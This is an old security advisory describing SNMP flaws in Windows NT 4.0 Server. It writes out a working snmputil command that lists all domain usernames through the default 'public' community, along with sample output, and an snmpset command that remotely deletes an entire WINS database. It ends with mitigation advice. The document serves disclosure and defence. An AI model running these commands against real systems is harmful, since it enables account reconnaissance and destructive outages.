COMMAND

    SNMP agent

SYSTEMS AFFECTED

    Win NT 4.0

PROBLEM

    Rouland,  Christopher  J  posted  following.   He  has  found  two
    significant "features" in the SNMP agent implementations under  NT
    4.0 Server  and there  may be  more if  you like  digging.   Let's
    start.

    1. This first exploit demonstrates the ability via SNMP to dump  a
       list of all usernames in an NT domain (assuming the target  box
       is a DC) or on an NT Server.

       Here is the simplest NT example Chris could find to use this:

        C:\NTRESKIT>snmputil walk <hostname> public .1.3.6.1.4.1.77.1.2.25

       <hostname> should  be a  domain controller  or server.   Sample
       output would be:

       Variable =
       .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU
       serTable.svUserEntry.svUserName.5.71.117.101.115.116
       Value    = OCTET STRING - Guest

       Variable =
       .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU
       serTable.svUserEntry.svUserName.5.116.101.115.116.49
       Value    = OCTET STRING - test1

       Variable =
       .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU
       serTable.svUserEntry.svUserName.5.116.101.115.116.50
       Value    = OCTET STRING - test2

       Variable =
       .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU
       serTable.svUserEntry.svUserName.5.116.101.115.116.51
       Value    = OCTET STRING - test3

       Variable =
       .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU
       serTable.svUserEntry.svUserName.5.116.101.115.116.52
       Value    = OCTET STRING - test4

       Variable =
       .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU
       serTable.svUserEntry.svUserName.5.116.101.115.116.53
       Value    = OCTET STRING - test5

       Variable =
       .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU
       serTable.svUserEntry.svUserName.5.116.101.115.116.54
       Value    = OCTET STRING - test6

       Variable =
       .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU
       serTable.svUserEntry.svUserName.5.116.101.115.116.55
       Value    = OCTET STRING - test7

       Variable =
       .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU
       serTable.svUserEntry.svUserName.5.116.101.115.116.56
       Value    = OCTET STRING - test8

       Variable =
       .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU
       serTable.svUserEntry.svUserName.5.116.101.115.116.57
       Value    = OCTET STRING - test9

       Variable =
       .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU
       serTable.svUserEntry.svUserName.6.116.101.115.116.49.48
       Value    = OCTET STRING - test10

       Variable =
       .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU
       serTable.svUserEntry.svUserName.8.116.101.115.116.117.115.101.114
       Value    = OCTET STRING - testuser

       Variable =
       .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU
       serTable.svUserEntry.svUserName.13.65.100.109.105.110.105.115.116.114.97
       .116.111.114
       Value    = OCTET STRING - Administrator

       Variable =
       .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU
       serTable.svUserEntry.svUserName.13.73.85.83.82.95.82.78.74.68.69.86.48.4
       9
       Value    = OCTET STRING - IUSR_NT4SRVDEV1

       Variable =
       .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU
       serTable.svUserEntry.svUserName.19.83.81.76.69.120.101.99.117.116.105.11
       8.101.67.109.100.69.120.101.99
       Value    = OCTET STRING - SQLExecutiveCmdExec

    2. The second exploit demonstrates the ability via SNMP to  delete
       all of the records in  a WINS database remotely, bypassing  all
       NT security.  If you understand large scale WINS  architecture,
       you can understand the implications of this.  Knowledge of SNMP
       community strings would allow  an attacker to effectively  shut
       down any large NT infrastructure with "N" commands (N=number of
       WINS servers).   This is permitted  due to the  extensive "cmd"
       set implemented in the WINS extension agent, specifically:

       cmdDeleteWins OBJECT-TYPE
                     SYNTAX  IpAddress
                     ACCESS  read-write
                     STATUS  mandatory
                     DESCRIPTION
                    "This variable when set will cause all information
                     pertaining  to  a  WINS  (data  records,  context
                     information to  be deleted  from the  local WINS.
                     Use this  only when  owner-address mapping  table
                     is getting to near capacity.  NOTE:  deletion  of
                     all information  pertaining to  the managed  WINS
                     is not permitted"
       ::= { cmd 3 }

       Since  the  SNMP  toolset  implemented  under  NT   will  not do
       snmp-set-requests, sample exploit was  done using the CMU  SNMP
       development kit under Unix (check UCD ftp site).  The command:

       rnjdev02:~/cmu$ snmpset -v 1 192.178.16.2 public .1.3.6.1.4.1.311.1.2.5.3.0 a 192.178.16.2

       successfully entirely deleted my WINS database.

    3. It appears  that there are  several other pieces  of the LMMIB2
       definition  that  allow  for  things  such  as  remote  session
       deletion or disconnect, etc.

SOLUTION

    The simplest fix  is to disable  SNMP, or to  remove the extension
    agents  through  the  SNMP  configuration  in the registry.  Since
    this problem  has been  disscused in  Phrack 50,  you may  want to
    check  what's  written  there  (I  don't remember NT was mentioned
    there, anyway, problem  is in SNMP).   Also, consider yourself  to
    move to another version of SNMP (examples here on SNMPv1).